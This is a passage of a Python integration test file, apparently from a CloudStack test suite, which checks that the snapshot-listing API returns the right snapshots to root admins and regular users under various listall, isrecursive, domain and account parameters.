self.debug("List as ROOT Admin - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false(self):
"""
Test listing of Snapshots by passing listall="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as ROOT Admin - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as ROOT Admin - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as ROOT Admin - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases without passing listall paramter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin(self):
"""
Test listing of Snapshots by passing no parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as ROOT Admin %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_rec_true(self):
"""
Test listing of Snapshots by passing isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as ROOT Admin - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_rec_false(self):
"""
Test listing of Snapshots by passing isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as ROOT Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainid and listall="true" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true")
self.debug("List as ROOT Admin passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainid , listall="true" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as ROOT Admin passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainid, listall="true" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as ROOT Admin passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainid, listall="false" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false")
self.debug("List as ROOT Admin passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainid, listall="false" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots in the subdoamin and domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as ROOT Admin passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainid, listall="false" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as ROOT Admin passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid(self):
"""
Test listing of Snapshots by passing domainid parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id)
self.debug("List as ROOT Admin passing domainId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_rec_true(self):
"""
Test listing of Snapshots by passing domainid and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots in the subdmain and domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as ROOT Admin passing domainId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_rec_false(self):
"""
Test listing of Snapshots by passing domainid and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as ROOT Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when account and domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "true" parameter as admin
Validate that it returns all the Snapshots of account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "true" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "true" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when account and domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "false" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "false" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account ,listall = "false" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when account and domainId is passed with listall not passed
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid(self):
"""
Test listing of Snapshots by passing domainid,account parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id)
self.debug("List as ROOT Admin passing domainId and accountId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as Regular User - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as Regular User - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
self.debug("List as Regular User - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false(self):
"""
Test listing of Snapshots by passing domainid,account,listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as Regular User - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as Regular User - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as Regular User - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases without passing listall paramter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser(self):
"""
Test listing of Snapshots by passing no parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as Regular User %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_rec_true(self):
"""
Test listing of Snapshots by passing isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as Regular User - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_rec_false(self):
"""
Test listing of Snapshots by passing isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as Regular User passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainid,listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true")
self.debug("List as Regular User passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainid,listall="true" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true", isrecursive="true")
self.debug("List as Regular User passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainid,listall="true" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
